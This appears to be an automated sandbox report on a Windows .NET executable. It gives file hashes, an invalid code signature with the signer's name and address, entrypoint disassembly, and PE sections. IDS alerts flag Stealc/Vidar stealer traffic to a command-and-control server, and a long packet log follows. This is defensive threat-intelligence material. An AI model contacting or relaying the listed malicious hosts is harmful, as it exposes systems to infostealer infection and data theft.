                                                                                                                                                                            Static File Info

                                                                                                                                                                            General

                                                                                                                                                                            File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                            Entropy (8bit):7.8915038656026955
                                                                                                                                                                            TrID:
                                                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.96%
                                                                                                                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                            File name:file.exe
                                                                                                                                                                            File size:421'040 bytes
                                                                                                                                                                            MD5:d5251bd2a4d9ee464b1dbb25245a67a7
                                                                                                                                                                            SHA1:a89c28d0c6f39475cf96c2129c4d10d73d0aa4b4
                                                                                                                                                                            SHA256:5aa5f829532b82d1d146841d843de9d3ab2278ba2c52402d51d18a5a2823872f
                                                                                                                                                                            SHA512:6a42887328eac8fc4036b08c01dd952ee7ee3640172e86cb4fd9654372ff8903ab8a616602e0f67f4192d63506bf92a6346b8ce3017eccbeab26c221e0451c4b
                                                                                                                                                                            SSDEEP:12288:7FWiaocklk/TYrcwBXCqE3iclBZkmYaugcCkVkNao:BzCcrPyqE7BOmYo
                                                                                                                                                                            TLSH:FB94CF9D765071DFC86BC8719AA82CB4FE6078BA472B4143A02712EE9E4D997CF540F3
                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.....................b............... ....@.. ....................................@................................

                                                                                                                                                                            File Icon

                                                                                                                                                                            Icon Hash:00928e8e8686b000

                                                                                                                                                                            Static PE Info

                                                                                                                                                                            General

                                                                                                                                                                            Entrypoint:0x46800a
                                                                                                                                                                            Entrypoint Section:
                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            Subsystem:windows cui
                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                            Time Stamp:0x66FDF1E0 [Thu Oct 3 01:22:40 2024 UTC]
                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                            OS Version Major:4
                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                            File Version Major:4
                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                            Authenticode Signature

                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                            Signature Issuer:CN=Sectigo RSA Code Signing CA, O=Sectigo Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                            Error Number:-2146869232
                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                            • 22/03/2021 00:00:00 21/03/2024 23:59:59
                                                                                                                                                                            Subject Chain
                                                                                                                                                                            • CN=Gary Kramlich, O=Gary Kramlich, STREET=2653 N 54TH ST, L=MILWAUKEE, S=Wisconsin, PostalCode=53210, C=US
                                                                                                                                                                            Version:3
                                                                                                                                                                            Thumbprint MD5:394B591BC2CE78B7CF207BF4082E62F4
                                                                                                                                                                            Thumbprint SHA-1:ADFA744AA074FB5DC57EE6445A3E18D606C7BF96
                                                                                                                                                                            Thumbprint SHA-256:AE7DB8B64E8ABD9D36876F049B9770D90C0868D7FE1A2D37CF327DF69FA2DBFE
                                                                                                                                                                            Serial:00F6AD45188E5566AA317BE23B4B8B2C2F

                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                            Instruction
                                                                                                                                                                            jmp dword ptr [00468000h]
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                            add byte ptr [eax], al

                                                                                                                                                                            Data Directories

                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x587680x53.text
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000x738.rsrc
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x610000x5cb0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x660000xc.reloc
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x680000x8
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x580000x48.text
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                            Sections

                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                            JO_E580x20000x556f40x55800d50232da462c35260a6395f254dc4e41False1.0003312317251463data7.9994803282182785IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                            .text0x580000xa7b00xa800117f817fe3f3fe1d52eca823120bcdafFalse0.3886021205357143data4.727908855420412IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                            .rsrc0x640000x7380x80027efb118827f19f9b26ee53766cf517bFalse0.39306640625data3.840654797805224IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                            .reloc0x660000xc0x200354e5ffc7f8a670c981da5a85608e4ceFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                            0x680000x100x200d94c8b594fef15b4030e460f1415aa2dFalse0.044921875data0.14263576814887827IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

                                                                                                                                                                            Resources

                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                            RT_VERSION0x640a00x4a8data0.4203020134228188
                                                                                                                                                                            RT_MANIFEST0x645480x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                                                                                                                            Imports

                                                                                                                                                                            DLLImport
                                                                                                                                                                            mscoree.dll_CorExeMain

                                                                                                                                                                            Network Behavior

                                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                            2024-10-03T03:26:45.002063+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.94971249.12.197.9443TCP
                                                                                                                                                                            2024-10-03T03:26:46.181996+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.94971349.12.197.9443TCP
                                                                                                                                                                            2024-10-03T03:26:47.706893+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.94971449.12.197.9443TCP
                                                                                                                                                                            2024-10-03T03:26:48.401039+02002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.94971449.12.197.9443TCP
                                                                                                                                                                            2024-10-03T03:26:49.063115+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.94971549.12.197.9443TCP
                                                                                                                                                                            2024-10-03T03:26:49.759104+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config149.12.197.9443192.168.2.949715TCP
                                                                                                                                                                            2024-10-03T03:26:50.472209+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.94971649.12.197.9443TCP
                                                                                                                                                                            2024-10-03T03:26:51.174591+02002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1149.12.197.9443192.168.2.949716TCP
                                                                                                                                                                            2024-10-03T03:26:51.910409+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.94971749.12.197.9443TCP
                                                                                                                                                                            2024-10-03T03:26:53.184930+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.94971849.12.197.9443TCP
                                                                                                                                                                            2024-10-03T03:26:56.335592+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.94971949.12.197.9443TCP
                                                                                                                                                                            2024-10-03T03:26:57.427072+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.94972049.12.197.9443TCP
                                                                                                                                                                            2024-10-03T03:26:59.780100+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.94972149.12.197.9443TCP
                                                                                                                                                                            2024-10-03T03:27:01.221985+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.94972249.12.197.9443TCP
                                                                                                                                                                            2024-10-03T03:27:03.387792+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.94972349.12.197.9443TCP
                                                                                                                                                                            2024-10-03T03:27:06.072223+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.94972449.12.197.9443TCP
                                                                                                                                                                            2024-10-03T03:27:08.017523+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.94972549.12.197.9443TCP
                                                                                                                                                                            2024-10-03T03:27:09.758776+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.94972649.12.197.9443TCP
                                                                                                                                                                            2024-10-03T03:27:11.287167+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.94972749.12.197.9443TCP
                                                                                                                                                                            2024-10-03T03:27:14.650634+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.94972949.12.197.9443TCP
                                                                                                                                                                            2024-10-03T03:27:16.347761+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.94973049.12.197.9443TCP
                                                                                                                                                                            2024-10-03T03:27:17.745181+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.94973149.12.197.9443TCP
                                                                                                                                                                            2024-10-03T03:27:19.571326+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.94973249.12.197.9443TCP
                                                                                                                                                                            2024-10-03T03:27:21.565877+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.94973349.12.197.9443TCP
                                                                                                                                                                            2024-10-03T03:27:23.962749+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.94973449.12.197.9443TCP
                                                                                                                                                                            2024-10-03T03:27:25.798987+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949735147.45.44.10480TCP

                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                            TCP Packets

                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                            Oct 3, 2024 03:26:42.399105072 CEST49711443192.168.2.9104.102.49.254
                                                                                                                                                                            Oct 3, 2024 03:26:42.399199963 CEST44349711104.102.49.254192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:42.399333000 CEST49711443192.168.2.9104.102.49.254
                                                                                                                                                                            Oct 3, 2024 03:26:42.423763990 CEST49711443192.168.2.9104.102.49.254
                                                                                                                                                                            Oct 3, 2024 03:26:42.423871040 CEST44349711104.102.49.254192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:43.081012011 CEST44349711104.102.49.254192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:43.081218958 CEST49711443192.168.2.9104.102.49.254
                                                                                                                                                                            Oct 3, 2024 03:26:43.538184881 CEST49711443192.168.2.9104.102.49.254
                                                                                                                                                                            Oct 3, 2024 03:26:43.538252115 CEST44349711104.102.49.254192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:43.538522959 CEST44349711104.102.49.254192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:43.538579941 CEST49711443192.168.2.9104.102.49.254
                                                                                                                                                                            Oct 3, 2024 03:26:43.545115948 CEST49711443192.168.2.9104.102.49.254
                                                                                                                                                                            Oct 3, 2024 03:26:43.591425896 CEST44349711104.102.49.254192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:43.944156885 CEST44349711104.102.49.254192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:43.944190979 CEST44349711104.102.49.254192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:43.944204092 CEST44349711104.102.49.254192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:43.944248915 CEST49711443192.168.2.9104.102.49.254
                                                                                                                                                                            Oct 3, 2024 03:26:43.944327116 CEST44349711104.102.49.254192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:43.944374084 CEST49711443192.168.2.9104.102.49.254
                                                                                                                                                                            Oct 3, 2024 03:26:43.944399118 CEST49711443192.168.2.9104.102.49.254
                                                                                                                                                                            Oct 3, 2024 03:26:44.042547941 CEST44349711104.102.49.254192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:44.042571068 CEST44349711104.102.49.254192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:44.042650938 CEST49711443192.168.2.9104.102.49.254
                                                                                                                                                                            Oct 3, 2024 03:26:44.042650938 CEST49711443192.168.2.9104.102.49.254
                                                                                                                                                                            Oct 3, 2024 03:26:44.042725086 CEST44349711104.102.49.254192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:44.042779922 CEST49711443192.168.2.9104.102.49.254
                                                                                                                                                                            Oct 3, 2024 03:26:44.047950983 CEST44349711104.102.49.254192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:44.048031092 CEST44349711104.102.49.254192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:44.048031092 CEST49711443192.168.2.9104.102.49.254
                                                                                                                                                                            Oct 3, 2024 03:26:44.048080921 CEST49711443192.168.2.9104.102.49.254
                                                                                                                                                                            Oct 3, 2024 03:26:44.055445910 CEST49711443192.168.2.9104.102.49.254
                                                                                                                                                                            Oct 3, 2024 03:26:44.055480003 CEST44349711104.102.49.254192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:44.147155046 CEST49712443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:44.147203922 CEST4434971249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:44.147285938 CEST49712443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:44.147543907 CEST49712443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:44.147562027 CEST4434971249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:45.001971960 CEST4434971249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:45.002063036 CEST49712443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:45.006145000 CEST49712443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:45.006153107 CEST4434971249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:45.006488085 CEST4434971249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:45.006552935 CEST49712443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:45.006956100 CEST49712443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:45.047441006 CEST4434971249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:45.509759903 CEST4434971249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:45.509850979 CEST49712443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:45.509871006 CEST4434971249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:45.509892941 CEST4434971249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:45.509918928 CEST49712443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:45.509939909 CEST49712443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:45.512531042 CEST49712443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:45.512550116 CEST4434971249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:45.521173000 CEST49713443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:45.521203995 CEST4434971349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:45.521277905 CEST49713443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:45.521466970 CEST49713443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:45.521472931 CEST4434971349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.181857109 CEST4434971349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.181996107 CEST49713443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.182683945 CEST49713443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.182694912 CEST4434971349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.184587002 CEST49713443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.184592962 CEST4434971349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.871251106 CEST4434971349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.871320009 CEST49713443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.871336937 CEST4434971349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.871351004 CEST4434971349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.871381044 CEST49713443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.871409893 CEST49713443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.922250032 CEST49713443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.922270060 CEST4434971349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.957842112 CEST49714443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.957874060 CEST4434971449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.957963943 CEST49714443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.958199024 CEST49714443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:46.958213091 CEST4434971449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:47.706810951 CEST4434971449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:47.706892967 CEST49714443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:47.707401991 CEST49714443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:47.707410097 CEST4434971449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:47.709131956 CEST49714443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:47.709136963 CEST4434971449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.401067019 CEST4434971449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.401087046 CEST4434971449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.401145935 CEST49714443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.401164055 CEST4434971449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.401176929 CEST4434971449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.401194096 CEST49714443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.401194096 CEST49714443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.401232004 CEST49714443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.401473999 CEST49714443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.401485920 CEST4434971449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.410446882 CEST49715443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.410492897 CEST4434971549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.410573959 CEST49715443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.410803080 CEST49715443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:48.410820961 CEST4434971549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.062926054 CEST4434971549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.063114882 CEST49715443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.063869953 CEST49715443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.063879967 CEST4434971549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.065705061 CEST49715443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.065711975 CEST4434971549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.758868933 CEST4434971549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.758893013 CEST4434971549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.758960009 CEST49715443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.758976936 CEST4434971549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.759000063 CEST49715443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.759032011 CEST49715443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.772377968 CEST49715443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.772401094 CEST4434971549.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.827914000 CEST49716443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.827975988 CEST4434971649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.828044891 CEST49716443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.828737974 CEST49716443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:49.828752995 CEST4434971649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:50.472054005 CEST4434971649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:50.472208977 CEST49716443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:50.472757101 CEST49716443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:50.472762108 CEST4434971649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:50.475025892 CEST49716443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:50.475030899 CEST4434971649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.174259901 CEST4434971649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.174350023 CEST49716443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.174365997 CEST4434971649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.174386024 CEST4434971649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.174415112 CEST49716443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.174433947 CEST49716443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.174537897 CEST49716443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.174554110 CEST4434971649.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.261873960 CEST49717443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:51.261923075 CEST4434971749.12.197.9192.168.2.9
